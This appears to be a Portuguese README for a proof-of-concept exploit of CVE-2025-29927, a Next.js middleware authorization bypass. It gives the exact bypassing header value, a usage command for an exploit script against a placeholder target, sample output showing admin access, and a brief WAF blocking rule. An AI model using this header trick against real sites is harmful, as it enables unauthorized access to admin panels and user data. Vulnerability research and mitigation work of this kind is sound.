
Aqui está um exploit simples, mas eficaz, para o CVE-2025-29927.
Este repositório contém um exploit de Prova de Conceito (PoC) para CVE-2025-29927, uma vulnerabilidade crítica no Next.js que permite a atacantes contornar verificações de autorização abusando de um cabeçalho HTTP específico do middleware.
Aplicações Next.js frequentemente dependem de middleware para autorização e controle de acesso. Este CVE surge de uma falha lógica em como o cabeçalho x-middleware-subrequest é processado. Quando este cabeçalho é definido como middleware, o servidor pode assumir incorretamente que a requisição se originou de lógica interna e contornar autenticação baseada em middleware.
Isso pode permitir que atacantes acessem painéis de administrador, APIs protegidas ou dados de usuário — sem credenciais ou sessão válida.
Fornecemos um script Python simples para testar se uma aplicação Next.js é vulnerável.
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...
x-middleware-subrequest como um sinal de confiança.Lógica do WAF:
if header 'x-middleware-subrequest' == 'middleware':
block_request()
Este PoC foi desenvolvido pela Equipe de Segurança Ofensiva da W2H Corp. como parte de nossos esforços contínuos de pesquisa de vulnerabilidades. O post original para a explicação do CVE está aqui.